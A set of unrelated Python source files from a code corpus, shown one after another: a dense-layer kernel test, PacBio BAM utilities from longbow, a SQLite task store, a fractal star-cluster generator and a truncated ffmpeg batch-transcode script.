        w1 = random_gaussian((out_dim, in_dim), miu=1, sigma=0.1).astype(dtype)
        # Reference uses w1^T so np.dot(d1, w2) matches the kernel's layout.
        w2 = w1.transpose().copy()
        if bias:
            # NOTE(review): (out_dim) is a plain int, not a 1-tuple — works only
            # if random_gaussian accepts a scalar size; confirm.
            b1 = random_gaussian((out_dim), miu=1, sigma=0.1).astype(dtype)
            mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape, b1.shape], [dtype, dtype, dtype], op_attrs,
                                      kernel_name=kernel_name, attrs=attrs, tuning=t)
            if t:
                exp_output = np.dot(d1, w2)
                # inputs and output to hold the data
                output = np.full(exp_output.shape, np.nan, dtype)
                # Add the bias column-wise to the reference output.
                for o in range(out_dim):
                    exp_output[:, o] += b1[o]
                args = [d1, w1, b1, output]
                return mod, exp_output, args
            return mod
        else:
            mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape], [dtype, dtype], op_attrs,
                                      kernel_name=kernel_name, attrs=attrs, tuning=t)
            if t:
                exp_output = np.dot(d1, w2)
                # inputs and output to hold the data
                output = np.full(exp_output.shape, np.nan, dtype)
                args = [d1, w1, output]
                return mod, exp_output, args
            else:
                return mod

    # --- Normal mode: build, launch, and verify against NumPy. ---
    d1 = random_gaussian((batch, in_dim), miu=1, sigma=0.1).astype(dtype)
    w1 = random_gaussian((out_dim, in_dim), miu=1, sigma=0.1).astype(dtype)
    w2 = w1.transpose().copy()
    exp_output = np.dot(d1, w2)
    # inputs and output to hold the data
    output = np.full(exp_output.shape, np.nan, dtype)
    if bias:
        b1 = random_gaussian((out_dim), miu=1, sigma=0.1).astype(dtype)
        for o in range(out_dim):
            exp_output[:, o] += b1[o]
        inputs = [d1, w1, b1]
        args = [d1, w1, b1, output]
        mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape, b1.shape], [dtype, dtype, dtype], op_attrs,
                                  kernel_name='dense', attrs=attrs)
    else:
        inputs = [d1, w1]
        args = [d1, w1, output]
        mod = utils.op_build_test(dense.dense, [d1.shape, w1.shape], [dtype, dtype], op_attrs, kernel_name='dense',
                                  attrs=attrs)
    acu_output = utils.mod_launch(mod, args, expect=exp_output)
    # compare result
    compare_result = compare_tensor(acu_output, exp_output, rtol=5e-03, equal_nan=True)
    return inputs, acu_output, exp_output, compare_result
|
<filename>src/longbow/utils/bam_utils.py<gh_stars>0
import sys
import os
import gzip
import re
import logging
import click_log
import collections
import re
from collections import OrderedDict
from math import ceil, floor
from construct import *
from inspect import getframeinfo, currentframe, getdoc
import pysam
from ..meta import VERSION
from ..utils.model import reverse_complement
# Route module logging to stderr with click-friendly configuration.
logging.basicConfig(stream=sys.stderr)
logger = logging.getLogger("bam_utils")
click_log.basic_config(logger)

# Matches canonical PacBio read names, e.g. "m64020_201213_022414/49/ccs".
PB_READ_NAME_RE = re.compile("m[0-9]+e?_[0-9]{6}_[0-9]{6}/[0-9]+/.*")

# Constants for bam file reading / writing (custom two-letter BAM tag names):
SEGMENTS_TAG = "SG"                  # per-read segment layout (joined SegmentInfo.to_tag values)
SEGMENTS_QUAL_TAG = "XQ"             # per-segment "score/max_score" strings
SEGMENTS_RC_TAG = "RC"               # whether the read was reverse-complemented before writing
SEGMENT_TAG_DELIMITER = ","          # separator used inside the list-valued tags above
READ_MODEL_NAME_TAG = "YN"           # name of the model used to annotate the read
READ_MODEL_SCORE_TAG = "YS"          # model log-probability for the read
READ_IS_VALID_FOR_MODEL_TAG = "YV"   # (not used in this chunk)
READ_FIRST_KEY_SEG_TAG = "YK"        # (not used in this chunk)
READ_NUM_KEY_SEGMENTS_TAG = "YG"     # (not used in this chunk)
READ_APPROX_QUAL_TAG = "YQ"          # approximate read quality: total_score / total_max_score
READ_UMI_TAG = ""                    # NOTE(review): empty tag name — looks unfinished; confirm intended value
# Named tuple to store alignment information:
class SegmentInfo(collections.namedtuple("SegmentInfo", ["name", "start", "end"])):
    """A named read segment spanning the inclusive range [start, end].

    Serializes to and from the compact ``name:start-end`` form used inside
    the SG BAM tag.
    """

    # Non-greedy name group, so the trailing ":<digits>-<digits>" is always
    # taken as the coordinates even if the name itself contains a colon.
    _tag_regex = re.compile(r"(.*?):(\d+)-(\d+)")

    def __len__(self):
        return self.end - self.start

    def __str__(self):
        return f"SegmentInfo({self.to_tag()})"

    def to_tag(self):
        """Return the compact tag form, e.g. ``adapter:10-20``."""
        return f"{self.name}:{self.start}-{self.end}"

    @classmethod
    def from_tag(cls, tag_string):
        """Parse a ``name:start-end`` tag back into a segment.

        Raises:
            ValueError: if ``tag_string`` does not match the expected format
                (previously this surfaced as an opaque TypeError).
        """
        match = cls._tag_regex.match(tag_string)
        if match is None:
            raise ValueError(f"Malformed segment tag: {tag_string!r}")
        # Use cls(...) instead of the hardcoded class name so subclasses
        # round-trip through from_tag correctly.
        return cls(match[1], int(match[2]), int(match[3]))
def load_read_count(pbi_file):
    """Return the number of reads recorded in a PacBio .pbi index file.

    (The original docstring — "Compute file offsets for specified read
    names" — described a different function; only the read count is read.)
    Only the index header, up to and including n_reads, is decoded.
    """
    # Decode PacBio .pbi file. This is not a full decode of the index, only the parts we need
    # until we get to the read count.
    # More on index format at https://pacbiofileformats.readthedocs.io/en/9.0/PacBioBamIndex.html .
    fmt = Struct(
        # Header
        "magic" / Const(b"PBI\x01"),
        "version_patch" / Int8ul,
        "version_minor" / Int8ul,
        "version_major" / Int8ul,
        "version_empty" / Int8ul,
        "pbi_flags" / Int16ul,
        "n_reads" / Int32ul,
    )

    # .pbi files are gzip-compressed; parse_stream stops after the fields above.
    with gzip.open(pbi_file, "rb") as f:
        idx_contents = fmt.parse_stream(f)
    return idx_contents.n_reads
def compute_shard_offsets(pbi_file, num_shards):
    """
    Compute all possible shard offsets (keeping adjacent reads from the ZMW together)

    Returns:
        shard_offsets: virtual file offsets marking shard starts, plus a
            past-the-end sentinel so the final read is retained.
        zmw_count_hash: number of reads per ZMW hole number.
        n_reads: total read count from the index header.
        read_counts: nominal number of ZMWs per shard (see NOTE below).
    """
    # Decode PacBio .pbi file. This is not a full decode of the index, only the parts we need for sharding.
    # More on index format at https://pacbiofileformats.readthedocs.io/en/9.0/PacBioBamIndex.html .
    fmt = Struct(
        # Header
        "magic" / Const(b"PBI\x01"),
        "version_patch" / Int8ul,
        "version_minor" / Int8ul,
        "version_major" / Int8ul,
        "version_empty" / Int8ul,
        "pbi_flags" / Int16ul,
        "n_reads" / Int32ul,
        "reserved" / Padding(18),

        # Basic information section (columnar format); columns we don't need
        # are skipped with Padding of the appropriate width.
        "rgId" / Padding(this.n_reads * 4),
        "qStart" / Padding(this.n_reads * 4),
        "qEnd" / Padding(this.n_reads * 4),
        "holeNumber" / Array(this.n_reads, Int32sl),
        "readQual" / Padding(this.n_reads * 4),
        "ctxtFlag" / Padding(this.n_reads * 1),
        "fileOffset" / Array(this.n_reads, Int64sl),
    )

    # Make a list of bgzf virtual file offsets for sharding and store ZMW counts.
    file_offsets_hash = OrderedDict()
    last_offset = 0  # NOTE(review): assigned but never read afterwards
    zmw_count_hash = dict()

    with gzip.open(pbi_file, "rb") as f:
        idx_contents = fmt.parse_stream(f)

        for j in range(0, idx_contents.n_reads):
            # Save only the virtual file offset for the first ZMW hole number, so
            # that shard boundaries always keep reads from the same ZMW together.
            if idx_contents.holeNumber[j] not in file_offsets_hash:
                file_offsets_hash[idx_contents.holeNumber[j]] = idx_contents.fileOffset[j]
                last_offset = idx_contents.fileOffset[j]

            try:
                zmw_count_hash[idx_contents.holeNumber[j]] += 1
            except KeyError:
                zmw_count_hash[idx_contents.holeNumber[j]] = 1

    # Take every ceil(num_zmws / num_shards)-th unique-ZMW offset as a shard start.
    file_offsets = list(file_offsets_hash.values())
    shard_offsets = []
    read_counts = []
    for j in range(0, len(file_offsets), ceil(len(file_offsets) / num_shards)):
        shard_offsets.append(file_offsets[j])
        # NOTE(review): nominal chunk size — the final shard may hold fewer ZMWs.
        read_counts.append(ceil(len(file_offsets) / num_shards))

    # For the last read in the file, pad the offset so the final comparison in write_shard() retains the final read.
    shard_offsets.append(os.path.getsize(pbi_file) + 1)

    return shard_offsets, zmw_count_hash, idx_contents.n_reads, read_counts
def create_bam_header_with_program_group(command_name, base_bam_header, description=None, models=None):
    """Create a pysam.AlignmentHeader object with program group (PG) information populated by the given arguments.

    This function is intended to be called from the 'main' function of a longbow subcommand because it uses reflection
    to pull in the first line of the docstring from the main function as the description (DS field).

    Args:
        command_name: subcommand name embedded in the PG ID.
        base_bam_header: existing pysam header whose dict is extended.
        description: explicit DS text; when falsy it is taken from the first
            docstring line of ``main`` in the *caller's* module globals.
        models: optional models whose JSON is appended to the DS field.
    """
    bam_header_dict = base_bam_header.to_dict()

    if not description:
        # Reflection: step one frame up to the caller and read the docstring
        # of the `main` symbol in that module.  Frame-depth sensitive: this
        # only works when called directly from the subcommand module.
        prev_frame = currentframe().f_back
        description = getdoc(prev_frame.f_globals['main']).split("\n")[0]

    # If we have a model here, we should add the description of the model to our program group:
    if models:
        description = description + " MODEL(s): " + ", ".join([m.to_json(indent=None) for m in models])

    # Add our program group to it:
    pg_dict = {
        "ID": f"longbow-{command_name}-{VERSION}",
        "PN": "longbow",
        "VN": f"{VERSION}",
        # Use reflection to get the first line of the doc string the caller - the main function for our header:
        "DS": description,
        "CL": " ".join(sys.argv),
    }
    # Append to an existing PG list, or start one.
    if "PG" in bam_header_dict:
        bam_header_dict["PG"].append(pg_dict)
    else:
        bam_header_dict["PG"] = [pg_dict]
    out_header = pysam.AlignmentHeader.from_dict(bam_header_dict)

    return out_header
def check_for_preexisting_files(file_list, exist_ok=False):
    """Check whether any path in ``file_list`` already exists on disk.

    If a file exists and ``exist_ok`` is False, an error is logged for every
    existing file and the program exits with status 1.  If a file exists and
    ``exist_ok`` is True, a warning is logged and execution continues.
    """
    # Accept a single bare path as well as a list/set of paths:
    if not isinstance(file_list, (list, set)):
        file_list = [file_list]

    # Collect the offending paths first, then report them in input order.
    existing = [path for path in file_list if os.path.exists(path)]
    for path in existing:
        if exist_ok:
            logger.warning(f"Output file exists: {path}. Overwriting.")
        else:
            logger.error(f"Output file already exists: {path}!")

    if existing and not exist_ok:
        sys.exit(1)
def get_segment_score(read_sequence, segment, model, ssw_aligner=None):
    """Get the alignment score of the given segment against the read sequence.

    Returns:
        (score, max_score): the aligner's score for the segment's bases vs the
        model's adapter sequence, and the best achievable score (match score
        times the adapter length).  Segments named "random" score (0, 0).
    """
    # We don't score random segments:
    if segment.name == "random":
        return 0, 0

    # Create a default aligner if we weren't given one:
    # NOTE(review): `ssw` is not imported in this module's visible imports, so
    # this default path would raise NameError — confirm the import exists
    # upstream, or always pass ssw_aligner in.
    if not ssw_aligner:
        ssw_aligner = ssw.Aligner()

    # Get our alignment and our score:
    # Segments shorter than 2 bases are not aligned and score 0.
    if segment.end - segment.start > 1:
        alignment = ssw_aligner.align(read_sequence[segment.start:segment.end], model.adapter_dict[segment.name])
        optimal_score = alignment.score
    else:
        optimal_score = 0

    # The max score is the match score * the length of the reference segment
    max_score = len(model.adapter_dict[segment.name]) * ssw_aligner.matrix.get_match()

    return optimal_score, max_score
def collapse_annotations(path):
    """Collapse a per-base label path into a list of SegmentInfo objects.

    ``path`` is a sequence of segment names, one per read position; runs of
    identical consecutive names are merged into single SegmentInfo entries
    with inclusive [start, end] coordinates.
    """
    # Guard: an empty path has no segments.  (The original emitted a bogus
    # SegmentInfo("", 0, 0) for empty input.)
    if not path:
        return []

    last = ""
    start = 0
    segments = []
    i = 0
    for i, seg in enumerate(path):
        if seg != last:
            # Close the previous run (if any) at the position before i.
            if i != 0:
                segments.append(SegmentInfo(last, start, i - 1))
            last = seg
            start = i
    # Don't forget the final, still-open run:
    segments.append(SegmentInfo(last, start, i))
    return segments
def write_annotated_read(read, segments, is_rc, logp, model, ssw_aligner, out_bam_file):
    """Write the given pysam.AlignedSegment read object to the given file with the given metadata.

    Args:
        read: pysam.AlignedSegment to tag and emit.
        segments: list of SegmentInfo spans describing the read's layout.
        is_rc: True if the model matched the reverse complement of the read.
        logp: log-probability score of the model path for this read.
        model: model used for annotation (supplies name and adapter dict).
        ssw_aligner: optional aligner reused across calls by get_segment_score.
        out_bam_file: open pysam.AlignmentFile to write into.
    """
    # Obligatory log message:
    logger.debug(
        "Path for read %s (%2.2f)%s: %s",
        read.query_name,
        logp,
        " (RC)" if is_rc else "",
        segments,
    )

    # Set our tag and write out the read to the annotated file:
    read.set_tag(SEGMENTS_TAG, SEGMENT_TAG_DELIMITER.join([s.to_tag() for s in segments]))

    # Set the model info tags:
    read.set_tag(READ_MODEL_SCORE_TAG, logp)
    read.set_tag(READ_MODEL_NAME_TAG, model.name)

    # If we're reverse complemented, we make it easy and just reverse complement the read and add a tag saying
    # that the read was RC:
    read.set_tag(SEGMENTS_RC_TAG, is_rc)
    if is_rc:
        # NOTE(review): qualities are captured before reassigning the sequence —
        # presumably because pysam clears qualities on sequence assignment; confirm.
        quals = read.query_qualities[::-1]
        seq = reverse_complement(read.query_sequence)
        read.query_sequence = seq
        read.query_qualities = quals

    # Get our segment scores and set them:
    total_score = 0
    total_max_score = 0
    score_strings = []
    for s in segments:
        score, max_score = get_segment_score(read.query_sequence, s, model, ssw_aligner)
        score_strings.append(f"{score}/{max_score}")
        total_score += score
        total_max_score += max_score

    read.set_tag(SEGMENTS_QUAL_TAG, SEGMENT_TAG_DELIMITER.join(score_strings))
    if total_max_score != 0:
        read.set_tag(READ_APPROX_QUAL_TAG, f"{total_score / total_max_score:.4f}")
    else:
        # Fixed: was a placeholder-free f-string (f"0.0", ruff F541).
        read.set_tag(READ_APPROX_QUAL_TAG, "0.0")

    out_bam_file.write(read)
|
import logger
import os
import json
import time
from datetime import datetime
from datetime import time
from operator import itemgetter
import sqlite3
from typing import List, Tuple
#this is used for storing a list of tasks as well as adding them
class TaskCollection(object):
    """Stores the user's tasks in a local SQLite database.

    Timestamps are persisted as '%m-%d-%Y, %H:%M:%S' strings; notification
    times are stored as a comma-separated list of quoted '%H:%M' strings
    (see serialize_notifications / deserialize_notifications).
    """

    def __init__(self):
        # Creates a connection to the database (creating the file if needed).
        self.conn = sqlite3.connect('user_data.db')
        self.curs = self.conn.cursor()
        # Creates a table to hold tasks if one doesn't exist.
        with self.conn:
            self.curs.execute("CREATE TABLE IF NOT EXISTS tasks(id_number TEXT, task_name TEXT, time_due TEXT, time_made TEXT, notifications TEXT)")
            logger.log("User_Tasks Created")

    def add_task(self, task_name: str, time_due: datetime, time_made: datetime, id_number: str, notifications: List[datetime.time] = None) -> None:
        '''
        adds a task with the given parameters
        '''
        # None sentinel instead of a mutable [] default (shared-list pitfall).
        if notifications is None:
            notifications = []
        with self.conn:
            self.curs.execute("INSERT INTO tasks(id_number, task_name, time_due, time_made, notifications) VALUES(?, ?, ?, ?, ?)",
                              (id_number, task_name, time_due.strftime('%m-%d-%Y, %H:%M:%S'),
                               time_made.strftime('%m-%d-%Y, %H:%M:%S'), self.serialize_notifications(notifications)))
        print(self.serialize_notifications(notifications))  # debug output, kept for parity
        logger.log("Adding Task")

    def edit_task(self, task_id: str, name_change: str, date_change: datetime, notifications: List[datetime.time] = None) -> None:
        '''
        updates the name, due date and notifications of the task with id task_id
        '''
        if notifications is None:
            notifications = []
        # Edits the task row in the tasks table (parameterized; stray f-prefix removed).
        with self.conn:
            self.curs.execute("UPDATE tasks SET task_name = ?, time_due = ?, notifications = ? WHERE id_number = ?",
                              (name_change, date_change.strftime('%m-%d-%Y, %H:%M:%S'),
                               self.serialize_notifications(notifications), task_id))
        logger.log("Editing Task")

    def delete_task(self, task_id: str) -> None:
        '''
        removes the task with id task_id from the list
        '''
        # Parameterized query: the old f-string version was open to SQL injection.
        with self.conn:
            self.curs.execute("DELETE FROM tasks WHERE id_number = ?", (task_id,))
        logger.log("Deleted Task")

    def get_tasks(self, order: str = 'da') -> List[Tuple[str, str, datetime, datetime]]:
        """Return all tasks as [id, name, due, made, notifications] lists.

        order: 'alpha' = by name, 'tra'/'trd' = by due date, anything else =
        by date added.
        """
        def get_by_alphabetic():
            self.curs.execute("SELECT * FROM tasks ORDER BY task_name")
            logger.log("Sorted Alphabetically")

        # NOTE(review): the *_asc helper sorts DESC and *_desc sorts ASC; kept
        # as-is because the UI may rely on the current ordering — confirm.
        def get_by_time_remaining_asc():
            self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_due) DESC")
            logger.log("Sorted by Time")

        def get_by_time_remaining_desc():
            self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_due) ASC")
            logger.log("Sorted by Reverse Time")

        def get_by_date_added():
            self.curs.execute("SELECT * FROM tasks ORDER BY DATETIME(time_made) ASC")
            logger.log("Sorted by Add Date")

        with self.conn:
            if order == 'alpha':
                get_by_alphabetic()
            elif order == 'tra':
                get_by_time_remaining_asc()
            elif order == 'trd':
                get_by_time_remaining_desc()
            else:
                get_by_date_added()
            all_tasks = self.curs.fetchall()
        return [[task[0], task[1], datetime.strptime(task[2], "%m-%d-%Y, %H:%M:%S"),
                 datetime.strptime(task[3], "%m-%d-%Y, %H:%M:%S"),
                 self.deserialize_notifications(task[4])] for task in all_tasks]

    def get_task(self, task_id: str) -> Tuple[str, str, datetime, datetime]:
        """Return a single task's [id, name, due, made, notifications]."""
        with self.conn:
            # Parameterized query instead of string interpolation.
            self.curs.execute("SELECT * FROM tasks WHERE id_number = ?", (task_id,))
            task = self.curs.fetchall()[0]
        return [task[0], task[1], datetime.strptime(task[2], "%m-%d-%Y, %H:%M:%S"),
                datetime.strptime(task[3], "%m-%d-%Y, %H:%M:%S"),
                self.deserialize_notifications(task[4])]

    def get_notifications(self, task_id: str) -> List[datetime.time]:
        """Return the list of notification times for the given task."""
        with self.conn:
            self.curs.execute("SELECT notifications FROM tasks WHERE id_number = ?", (task_id,))
            return self.deserialize_notifications(self.curs.fetchall()[0][0])

    def serialize_notifications(self, times: List[datetime.time] = None) -> str:
        """Encode times as "'HH:MM', 'HH:MM', ..." (list repr minus brackets)."""
        if times is None:
            times = []
        return str([t.strftime('%H:%M') for t in times])[1:-1]

    def deserialize_notifications(self, times: str) -> List[datetime.time]:
        """Decode the string produced by serialize_notifications."""
        if times == '':
            return []
        return [datetime.strptime(entry.lstrip()[1:-1], '%H:%M').time()
                for entry in times.split(',')]
|
"""
This program generates positions of stars born through a fractal tree
(see Goodwin, Whitworth 2004)
"""
import numpy as np
from random import *
from matplotlib import pyplot as plt
import itertools
from copy import deepcopy
from nb6.pysnap import PySnap
import cluster_models as CM
from cluster_models import salpeter
from energy import virialise
class Leaf(object):
    """
    Basis unit of the fractal tree.
    Contains a recursive self-replicating method (GrowNextLeaves)
    """
    # The 8 corners of a cube; each child leaf is displaced toward one corner.
    coords = np.array([[ 1, 1,-1], [-1, 1, 1], [-1,-1, 1], [ 1,-1,-1],
                       [ 1,-1, 1], [-1, 1,-1], [ 1, 1, 1], [-1,-1,-1]])

    def __init__(self,position,level):
        # position: [x, y, z]; level: depth in the tree (root is level 0).
        self.position = position
        self.level = level
        self.LastLeaf = True   # True until children are spawned
        self.mass = None       # filled later (deepest leaves get IMF masses)
        self.velocity = None   # filled later by VirialiseChild/TransmitVelocity

    def GenerateNewLeafPosition(self,length,noise,C):
        # Child sits a quarter of the current cell toward corner C, with
        # Gaussian jitter to avoid a regular grid aspect.
        return [self.position[0] + C[0] * length/4. + np.random.normal(0,noise*length),
                self.position[1] + C[1] * length/4. + np.random.normal(0,noise*length),
                self.position[2] + C[2] * length/4. + np.random.normal(0,noise*length)]

    def GenerateNewLeaves(self,length,dimension,noise):
        """
        Computes 8 random numbers, compares to the creation probability that
        is computed from the fractal dimension, then create child leaves to the
        current leaves.
        """
        # Each of the 8 corners spawns a child with probability 2**(dimension-3).
        P = np.random.random(8) < 2**(dimension-3)
        self.ChildLeaves = []
        for C in Leaf.coords[P]:
            NewPositions = self.GenerateNewLeafPosition(length,noise,C)
            self.ChildLeaves.append( Leaf(NewPositions, self.level+1))
        # NOTE(review): identity test `is not 0` should be `!= 0`; it only works
        # because CPython interns small integers.
        if len(self.ChildLeaves) is not 0:
            self.LastLeaf = False

    def GrowNextLeaves(self,nlevel,length,noise,dimension):
        """
        Create child leaves and go into child leaves to create
        "grand-child" leaves, and so on util nlevel layers of
        leaves are created.
        """
        self.GenerateNewLeaves(length,dimension,noise)
        # Recurse with the cell size halved at each generation.
        for C in self.ChildLeaves:
            if C.level < self.level + nlevel:
                C.GrowNextLeaves(nlevel-1,length/2.,noise,dimension)

    def PrintLeaf(self,prefix=""):
        # Dump the subtree as an indented listing (Python 2 print statement).
        x,y,z = self.position[0], self.position[1], self.position[2]
        print prefix+" "+str(x)+" "+str(y)+" "+str(z)
        if not self.LastLeaf:
            for L in self.ChildLeaves:
                L.PrintLeaf(prefix=prefix+" | ")

    def CollectLeaves(self,level,RequestedLeaves=None):
        """
        Grabs all leaves objects at a specified level
        """
        if RequestedLeaves is None:
            RequestedLeaves =[]
        for C in self.ChildLeaves:
            if C.level == level:
                RequestedLeaves.append(C)
            else:
                # Not at the requested depth yet: descend into the child.
                RequestedLeaves = C.CollectLeaves(level,RequestedLeaves=RequestedLeaves)
        return RequestedLeaves

    def GetDescendingMass(self,TotalMass=None):
        """
        Go down the fractal tree, adding any mass present in leaves at each level.
        """
        if TotalMass is None:
            TotalMass = 0
        LocalMass = 0
        # Sum the masses of direct children; recurse where a child's mass is unset.
        for C in self.ChildLeaves:
            if C.mass is not None:
                LocalMass += C.mass
            else:
                LocalMass += C.GetDescendingMass(TotalMass=LocalMass)
        self.mass = LocalMass
        return LocalMass

    def GetChildPositions(self):
        # Positions of direct children, stacked as an (n, 3) array.
        r = []
        for C in self.ChildLeaves:
            r.append(C.position)
        return np.array(r)

    def GetChildMasses(self):
        # Masses of direct children as a 1-D array.
        m = []
        for C in self.ChildLeaves:
            m.append(C.mass)
        return np.array(m)

    def GetChildVelocities(self):
        # Velocities of direct children, stacked as an (n, 3) array.
        v = []
        for C in self.ChildLeaves:
            v.append(C.velocity)
        return np.array(v)

    def VirialiseChild(self,Q):
        """Virialise the child leaves velocities to match the requested Q"""
        if self.level == 0:
            self.velocity = np.array([0.,0.,0.])
        if not self.LastLeaf :
            # NOTE(review): identity test `is not 1` should be `!= 1`.
            if len(self.ChildLeaves) is not 1:
                # NOTE(review): m, x, y, z and the parameter Q are computed/passed
                # but never used below — child velocities are plain unit
                # Gaussians.  Possibly leftover from an energy-based
                # virialisation; confirm.
                m = self.GetChildMasses()
                x,y,z = np.transpose( self.GetChildPositions() )
                vx,vy,vz = np.transpose(np.random.normal(0.,1.0,(len(self.ChildLeaves),3)))
                v = np.array([ [VX,VY,VZ] for (VX,VY,VZ) in zip(vx,vy,vz)])
                for (vv,C) in zip(v,self.ChildLeaves):
                    C.velocity = vv
                    C.VirialiseChild(Q)
            else:
                # A single child simply inherits this leaf's velocity.
                self.ChildLeaves[0].velocity = self.velocity
                self.ChildLeaves[0].VirialiseChild(Q)

    def TransmitVelocity(self):
        """Apply inheritance of velocity from parent to child"""
        if not self.LastLeaf:
            for C in self.ChildLeaves:
                C.velocity += self.velocity
                C.TransmitVelocity()

    def FillIndices(self,level,inc=0):
        # Build a nested list of running indices mirroring the tree structure
        # down to `level`; the root call (level 0) returns just the nested list,
        # recursive calls also return the running counter.
        indices = []
        for C in self.ChildLeaves:
            if C.level == level:
                inc +=1
                indices.append(inc)
            else:
                # NOTE(review): identity test `is not 0` should be `!= 0`.
                if len(C.ChildLeaves) is not 0:
                    ind, inc = C.FillIndices(level,inc=inc)
                    indices.append(ind)
        if self.level == 0:
            return indices
        else:
            return indices, inc
class FractalTree(object):
    """
    Tree = FractalTree( nlevel, dimension, noise, length=1.0)
    ---------------------------------------------
    nlevel : how many layers of leaves
    dimension : fractal dimension, must be <3. Leaf spawning depends on
                the probability 2^(dimension-3). Can be seen as a
                reversed filling factor: 3 is full filling, no fractality.
    noise : To avoid grid aspect, some noise is applied to positions
            at each generation.
    length : Side length of total system.
    mass_range : Stellar mass function. Same than standard cluster creation
    alpha : Stellar mass function. Same than standard cluster creation

    Generate a fractal tree made of Leaf objects. The final number of particles
    is uncertain, trial and error is advised to see how fractal tree building work.
    """
    def __init__(self,nlevel,dimension,noise,length = 1.0,
                 mass_range=[0.35,20], alpha=2.37, AttributeVelocities=True):
        self.nlevel = nlevel
        self.N = 0
        # Retry until the stochastic growth leaves at least one particle at the
        # deepest level.
        # NOTE(review): `is 0` identity comparison should be `== 0`.
        while self.N is 0:
            self.Leaf = Leaf([0,0,0],0)
            self.Leaf.GrowNextLeaves(nlevel,length,noise,dimension)
            self.particles = self.Leaf.CollectLeaves(self.nlevel)
            self.N = len(self.particles)
        # NOTE(review): AttributeVelocities is accepted but unused here —
        # velocity attribution actually happens in Snap().
        self.AttributeMasses(mass_range,alpha)

    def GetVelocities(self):
        # Velocities of all deepest-level leaves as an (N, 3) array.
        self.velocities = [[L.velocity[0],L.velocity[1],L.velocity[2]]
                           for L in self.particles ]
        return np.array(self.velocities)

    def GetPositions(self):
        # Positions of all deepest-level leaves as an (N, 3) array.
        self.positions = [ [L.position[0],L.position[1],L.position[2]]
                           for L in self.particles ]
        return np.array(self.positions)

    def Plot(self,**kwargs):
        # Quick 3D scatter of the current particle positions.
        P = self.GetPositions()
        fig = plt.figure(figsize=(9,9))
        ax = fig.add_subplot(111,projection="3d")
        ax.plot(P[:,0],P[:,1],P[:,2],"o",markersize=2,**kwargs)
        plt.tight_layout()
        plt.show()

    def AttributeMasses(self,mass_range=[0.2,20],alpha=2.37):
        # Draw masses from the Salpeter-like IMF; keep the raw draws in
        # O_masses, and a total-mass-normalised copy in self.masses.
        masses = CM.salpeter(self.N,alpha,mass_range)
        self.O_masses = deepcopy(masses)
        self.masses = masses/masses.sum()
        # NOTE(review): leaves are given the *unnormalised* masses while
        # self.masses (used by Snap) is normalised — confirm this mismatch.
        for m,p in zip(masses,self.particles):
            p.mass = m
        self.Mt = masses.sum()
        # Propagate summed masses up through the tree.
        self.Leaf.GetDescendingMass()

    def Snap(self,AttributeVelocities=True):
        """
        Convert Fractal tree to PySnap.
        """
        if AttributeVelocities:
            self.Leaf.VirialiseChild(0.5)
            self.Leaf.TransmitVelocity()
            v = self.GetVelocities()
        else:
            v = np.zeros((self.N,3))
        r = self.GetPositions()
        S = PySnap(0,range(1,self.N+1),self.masses,r[:,0],r[:,1],r[:,2],
                   v[:,0],v[:,1],v[:,2])
        S.Leaf = self.Leaf
        return S
def FractalModel(nlevel=5, dimension=2.0, noise=0.5,
                 length=1.0, mass_range=[0.2,20],Velocities=True):
    """
    S = FractalModel( nlevel, dimension, noise, length=1.0)
    ---------------------------------------------
    nlevel : how many layers of leaves
    dimension : fractal dimension, must be <3. Leaf spawning depends on
                the probability 2^(dimension-3). Can be seen as a
                reversed filling factor: 3 is full filling, no fractality.
    noise : To avoid grid aspect, some noise is applied to positions
            at each generation.
    length : Side length of total system.
    mass_range : Stellar mass function. Same than standard cluster creation
    alpha : Stellar mass function. Same than standard cluster creation

    Generate PySnap of a fractal model, then virialise it.
    The final number of particles is uncertain, trial and error is advised to see
    how fractal tree building work.
    """
    # NOTE(review): `length` is accepted but never forwarded to FractalTree,
    # so the tree always uses its default length — confirm intent.
    T = FractalTree(nlevel,dimension,noise,AttributeVelocities=Velocities,mass_range=mass_range)
    # Python 2 print statement.
    print T.N, " particles created"
    S = T.Snap()
    S.Tree = T
    S.virialise(0.5)
    return S
|
import os
from pymediainfo import MediaInfo

# Recursively walk the current directory for candidate video files.
filetuple = os.walk(r'./')
# Hardware-accelerated decode backend (qsv/cuda/nvenc/amf).  Translated note:
# when using qsv, make sure no discrete GPU (especially NVIDIA) is present,
# otherwise ffmpeg crashes — known bug, see
# https://trac.ffmpeg.org/ticket/6996.  Leave empty to disable.
hwaccel=''
#hwaccel=r' -hwaccel qsv '
# Decoder selection: h264_cuvid/h264_amf/h264_qsv/libx264; leave empty to let ffmpeg choose.
#self_decodec=''
self_decodec=r' -c:v h264_qsv '
# Encoder selection: h264_nvenc/h264_amf/h264_qsv/libx264.
# (Original comment said "decoder" here — copy-paste slip.)
#self_encodec=''
self_encodec=r' -c:v h264_qsv '
# Target video bitrate (kbps).
destiny_bitrate=4000
# Target file size (MB).
destiny_space=200
# Target frame rate.
fps=r'23'
# Target container format.  NOTE(review): this shadows the builtin `format`.
format=r'.mp4'
# Transcode command: re-encode one file with the configured codecs,
# bitrate, height and frame rate, writing "<name>_convert<format>".
def change_bat(file_name, extension, bit_rate, height):
    """Build and run the ffmpeg transcode command for a single video."""
    source = '"' + file_name + extension + '"'
    target = '"' + file_name + r'_convert' + format + '"'
    command = (
        r'ffmpeg' + hwaccel + self_decodec + r'-i ' + source + self_encodec
        + r' -b:v ' + str(bit_rate) + r' -vf scale=-1:' + str(height)
        + r' -r ' + fps + r' -y ' + target
    )
    os.system(command)
# Probe the container bit rate of a file.
def detect_bit_rate(file_name):
    """Return the container bit rate (bps, as a string) reported by ffprobe."""
    probe_cmd = (r'ffprobe -i "' + file_name
                 + r'" -show_entries format=bit_rate -v quiet -of csv="p=0"')
    output = os.popen(probe_cmd).read()
    return output.split()[0]
# Probe the pixel height of a video stream.
def detect_height(file_name):
    """Return the video stream height (pixels, as a string) reported by ffprobe."""
    probe_cmd = (r'ffprobe -i "' + file_name
                 + r'" -show_entries stream=height -v quiet -of csv="p=0"')
    output = os.popen(probe_cmd).read()
    return output.split()[0]
# Walk every file under the current directory and shrink videos that exceed
# the target size; everything else is copied with a "_noconvert" name so
# later runs can skip it.
for path, dir_list, files in filetuple:
    for file in files:
        try:
            # NOTE(review): str.strip('./') removes *characters* from both
            # ends, not a "./" prefix — kept because downstream names depend
